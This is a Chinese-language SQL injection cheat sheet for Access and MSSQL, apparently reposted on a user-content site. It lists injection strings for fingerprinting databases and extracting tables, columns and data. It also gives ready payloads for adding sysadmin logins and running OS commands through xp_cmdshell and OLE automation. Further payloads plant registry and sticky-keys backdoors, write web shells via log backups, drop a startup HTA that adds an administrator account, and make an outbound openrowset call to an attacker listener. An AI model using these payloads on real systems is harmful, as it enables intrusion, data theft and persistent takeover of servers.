SQL注射笔记 access、mssql

and、or select * from admin where 1=1 [and、or] 2=2

order by select * from admin where 1=1 [order by] 2

union select * from admin (where 1=1) [union] select 1,2,3...,n from admin

varchar/nvarchar和int类型的字段union到一起时会强制转换 and 1=2 union

text/ntext和image类型的字段union不能用DISTINCT方式 union all

text/ntext和int类型的字段union到一起时不兼容 '1','2','3'...,'n' 或者 char(49),....

判断数据库

and (select count(*) from msysobjects)>0 msysobjects为access特有但默认无权限读取

and (select count(*) from sysobjects)>0 sysobjects为mssql特有

两错为access 一错二对为mssql

ACCESS注射

注释符: NULL 或者

不支持多句执行支持联合查询

数字型

1、

and exists (select * from 表段)

and (select count(*) from 表段)>0

and exists (select 字段 from 表段）

and (select count(字段) from 表段)>0

2、1

and (select top 1 len(字段) from 表段)>5

and (select len(字段2) from 表段 where 字段1=N)>5

and (select top 1 asc(mid(字段,N,1)) from 表段)>96

and (select asc(mid(字段2,N,1)) from 表段 where 字段1=N)>96

and (select top 1 ascii(substring(字段,N,1)) from 表段)>96 //////////// MSSQL

2、2

order by n

and 1=2 union all select 1,2,3,4,...,n from 表段

and 1=2 union all select 1,2,字段,4,...,n from 表段

字符型

' and 1=1 and '1'='1

' and (select count(*) from 表段)>0 and '1'='1

' and 1=2 union all select 1,2,3,4,...,n from 表段 where '1'='1

搜索型

%' and 1=1 and '%'='

%' and (select count(*) from 表段)>0 and '%'='

%' and 1=2 union all select 1,2,3,4,...,n from 表段 where '%'='

access跨库

把表段换成数据库物理地址.表段

group by 1 having 1=1 暴出第一个字段（数字型）

group by 1,字段1 having 1=1 暴出第二个字段

having sum(1)=1 必爆第一个字段

' group by 1 having '1'='1 暴出第一个字段（字符型）

' group by 1,字段1 having '1'='1 暴出第二个字段

' having sum(1)='1 必爆第一个字段

偏移注射

order by 10 正在查询的字段有10个

and 1=2 union select 1,2,3,4,5,6,7,* from admin 表段admin有3个字段

and 1=2 union select 1,2,3,4,5,6,7,8,9,id from admin 表段admin存在字段id

and 1=2 union select 1,2,3,4,* from (admin as a inner join admin as b on a.id=b.id) 在5-10位置显示数据

and 1=2 union select 1,2,3,4,a.id,* from (admin as a inner join admin as b on a.id=b.id) 打乱5-10位置数据排序（MSSQL无效）

and 1=2 union select 1,2,3,4,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) 打乱5-10位置数据排序（MSSQL无效）

and 1=2 union select 1,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) 在2-10位置显示数据

MSSQL注射

注释符: --

支持多句执行支持联合查询

sa权限

master.dbo.xp_cmdshell

master.dbo.xp_regwrite

sp_oa** 任意用户拥有master数据库owner权限也可

sp_**job**

sp_makewebtask

master.dbo.xp_servicecontrol

master.dbo.xp_regdeletevalue

master.dbo.sysxlogins(not exec) mssql2005为syslogins

master.dbo.sp_addlogin

master.dbo.sp_dropextendedproc

master.dbo.sp_addextendedproc

xp_makecab\xp_unpackcab

BULK INSERT

owner权限

create table

backup to disk

public权限

create ##table 全局临时表存储在tempdb数据库sysobjects表 URL提交需编码 ##table

exec master.dbo.xp_regread 2005 sa

exec master.dbo.xp_dirtree 2005 sa

select master.dbo.sysdatabases

select master.dbo.sysobjects

;无关联sql语句执行sql语句，如update/insert/exec，但无回显

;exec xp_availablemedia-- 获取驱动器

insert注射时可用报错
convert(int,@@version)

cast(@@version as int)

and user>0--

and system_user>0

user是SQL server的一个内置变量，它的值是当前连接的用户名。他会提示将“用户名”转换为int出错。如果是sa权限。提示的是将“dbo”转换成int出错。暴出数据库用户名。

and (select @@version)>0-- 返回对方系统的版本和SQL的具体版本

and host_name()>0 WEB服务器名

and @@servername>0 DATA服务器名

and db_name()>0-- 暴出当前数据库名

and db_name(N)>0-- 暴出其他数据库名

and (select filename from master.dbo.sysdatabases where name='数据库名')>0-- 暴出数据库路径

and system_user>0-- 暴出当前账号

and (select IS_SRVROLEMEMBER('sysadmin'))>0--

判断服务器角色sysadmin、dbcreator、diskadmin、processadmin、serveradmin、setupadmin、securityadmin

and (select IS_MEMBER('db_owner'))>0--

判断数据库角色db_owner、db_datareader、db_datawriter、public

and (select @@servername)>0-- 获取主机名

and (select top 1 name from sysobjects where xtype='U')>0-- 暴出第1个表段

and (select top 1 name from sysobjects where xtype=char(85) and name not in ('表段1'))>0-- 暴出第2个表段

and (select top 1 name from sysobjects where xtype=char(85) and name not in ('表段1'，'表段2'))>0-- 暴出第3个表段

或者

;drop table ##tempsec;create TABLE ##tempsec(result varchar(1000) NULL, id int NOT NULL IDENTITY (1,1))--

;insert into ##tempsec select name from sysobjects where xtype=char(85)--

可修为;insert into ##tempsec select TABLE_NAME from INFORMATION_SCHEMA.TABLES ////////// MSSQL2005

and (select result from ##tempsec where id=N)>0--

having 1=1-- 暴出当前字段

group by 字段1 having 1=1-- 暴出第二个字段

group by 字段1,字段2 having 1=1-- 暴出第三个字段

and (select top 1 col_name(object_id('表段'),N) from sysobjects)>0-- 暴出某表段第N个字段

and (select top 1 字段 from 表段)>0-- 暴出第1条数据

mssql跨库

and (select top 1 name from master.dbo.sysdatabases where dbid=N)>0-- 暴出第N个数据库名

and (select top 1 name from 数据库名.dbo.sysobjects where xtype='U')>0-- 暴出某数据库第1个表段

and (select top 1 name from master.dbo.sysxlogins)>0-- 暴出第1个SQL账户

;exec master.dbo.sp_addlogin UserName,Password-- 添加SQL账户

and (select count(*) from master.dbo.sysxlogins where name='UserName')>0-- 判断是否添加账户

;exec master.dbo.sp_addsrvrolemember UserName,sysadmin-- 提升为sysadmin权限

and (select count(*) from master.dbo.sysxlogins where name='UserName' and xstatus=18)>0-- 判断是否提权

and (select count(*) from master.dbo.sysobjects where name= 'xp_cmdshell')>0-- 检测xp_cmdshell(CMD命令)

;exec master.dbo.xp_cmdshell 'CMD命令'-- 执行cmd命令，无回显

;exec master.dbo.sp_dropextendedproc 'xp_cmdshell'-- 删除xp_cmdshell

;exec master.dbo.sp_addextendedproc xp_cmdshell,'xplog70.dll'-- 恢复xp_cmdshell

如果sp_addextendedproc被删，CREATE PROCEDURE必须是批查询中的第一条语句，所以使用查询分析器执行下面语句恢复。

create procedure sp_addextendedproc

@functname nvarchar(517),

@dllname varchar(255)

set implicit_transactions off

if @@trancount > 0

begin

raiserror(15002,-1,-1,'sp_addextendedproc')

return (1)

end

dbcc addextendedproc( @functname, @dllname)

return (0)

;drop table tempsec;create TABLE tempsec(result varchar(1000) NULL, id int NOT NULL IDENTITY (1,1))-- 创建临时表

;insert into tempsec exec master.dbo.xp_cmdshell 'ipconfig /all'-- 插入内容

and (select result from tempsec where id=N)>0-- 查看第N行内容

and (select count(*) from master.dbo.sysobjects where name= 'xp_regwrite')>0-- 检测xp_regwrite(写注册表)

;exec master.dbo.xp_regwrite '项','子项','值项名称','值项类型','值项数据'-- 写入值项

;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','hackadd','REG_SZ','net user 123 123/add'--

;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_SZ','C:\WINDOWS\system32\cmd.exe'--

xp_regread

;exec master.dbo.xp_regread '项','子项','值项名称'-- (读注册表) 可插入临时表后报错输出、临时表需要两列存放值项类型和值项数据

xp_regdeletevalue

;exec master.dbo.xp_regdeletevalue '项','子项','值项名称'-- (删注册表)

沙盒模式

;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0-- 关闭沙盒

;select * from OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")')-- 执行命令换成C:\WINDOWS\system32\ias\dnary.mdb或者其他mdb也可

获取数据库服务器IP

---------------------------Assume-MyIP:8.8.8.8----------------------------------------------

nc -vv -l -p 4433

--------------------------------------------------------------------------------------------

;select * from openrowset('sqloledb','server=8.8.8.8,4433;uid=a;pwd=a','select @@version')--

--------------------------------------------------------------------------------------------

;exec sp_makewebtask '物理地址','select ''内容'''-- 生成文件（内容前后是两个单引号）

;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'CMD命令'-- 执行命令

;declare @shell int exec sp_oacreate 'Shell.Application',@shell output exec sp_oamethod @shell,'ShellExecute',null,'cmd.exe','cmd /c CMD命令'-- 执行命令

;declare @o int, @f int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, '物理地址', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'内容'-- 写入内容

;declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\cmd.exe' ,'c:\windows\system32\sethc.exe'-- 文件复制

读取文件

declare @o int, @f int, @t int, @ret int

declare @line varchar(8000)

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1

exec @ret = sp_oamethod @f, 'readline', @line out

while( @ret = 0 )

begin

print @line

exec @ret = sp_oamethod @f, 'readline', @line out

end

;exec msdb.dbo.sp_delete_job null,'tempsec';exec msdb.dbo.sp_add_job 'tempsec';exec msdb.dbo.sp_add_jobstep null,'tempsec',null,'1','cmdexec','cmd /c CMD命令';exec msdb.dbo.sp_add_jobserver null,'tempsec',N'(LOCAL)';exec msdb.dbo.sp_start_job 'tempsec',null,@step_name=1-- 执行任务需要开启SQLSERVERAGENT服务

;exec master.dbo.xp_servicecontrol 'start','服务名称' 启动系统服务

;drop table tempsec;create table tempsec(dir nvarchar(255),depth varchar(255),files varchar(255) ,ID int NOT NULL IDENTITY (1,1))--

;insert into tempsec(dir,depth,files) exec master.dbo.xp_dirtree '目录路径',1,1--

and (select dir from tempsec where id=N)>0-- 输出第N个目录或文件

BULK INSERT查看文件内容

drop table tmpsec

CREATE TABLE tmpsec(ResultTxt nvarchar(1024) NULL)

BULK INSERT tmpsec FROM 'C:\boot.ini' WITH (KEEPNULLS)

select * from tmpsec

CAB压缩、解压

exec master.dbo.xp_makecab 'D:\boot.cab','mszip',1,'C:\boot.ini'

exec master.dbo.xp_unpackcab 'D:\boot.cab','D:\',1,'boot.txt'

log增量备份如果数据库名以数字开头则需要双引号

;alter database 数据库名 set RECOVERY FULL-- 把SQL设置成日志完全恢复模式

;backup database 数据库名 to disk = 'c:\bak' with init-- ////////////////////////////// MSSQL2005

;create table cmd (a image)-- 新建立一个cmd表

;backup log 数据库名 to disk = 'c:\bak' with init-- 缩减备份数据的大小

;insert into cmd (a) values (一句话木马16进制)-- 插入一句话木马（16进制不需要单引号其他的要)

;backup log 数据库名 to disk = '物理路径'-- 备份日志到目标网站WEB路径

;drop table cmd-- 删除新建的cmd表

;alter database 数据库名 set RECOVERY SIMPLE--

owner权限提权

;create table [starup]([cmd] [image]);--

;declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;--

;insert into [starup](cmd)values('<html><script language=VBScript>window.moveTo 8888,8888:Set s=CreateObject("Wscript.Shell"):s.Run "cmd.exe /c net user oo xx /add",0:s.Run "cmd.exe /c net localgroup administrators oo /add",0:window.resizeTo 0,0:window.close</script></html>');--

;declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='C:\Documents and Settings\All Users\「开始」菜单\程序\启动\starup.hta' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;--

;drop table [starup];--

and substring((select @@version),22,4)='2005' 判断是否2005

MSSQL2005默认不开启xp_cmdshell、OpenRowSet、sp_oa*、sp_makewebtask

;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;-- 开启xp_cmdshell

;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;-- 关闭xp_cmdshell

;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;-- 开启OpenRowSet

;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'Ad Hoc Distributed Queries',0;RECONFIGURE;-- 关闭OpenRowSet

;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'Ole Automation Procedures',1;RECONFIGURE;-- 开启sp_oa*

;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'Ole Automation Procedures',0;RECONFIGURE;-- 关闭sp_oa*

;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'Web Assistant Procedures',1;RECONFIGURE;-- 开启sp_makewebtask

;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'Web Assistant Procedures',0;RECONFIGURE;-- 关闭sp_makewebtask

本站仅提供存储服务，所有内容均由用户发布，如发现有害或侵权内容，请点击举报。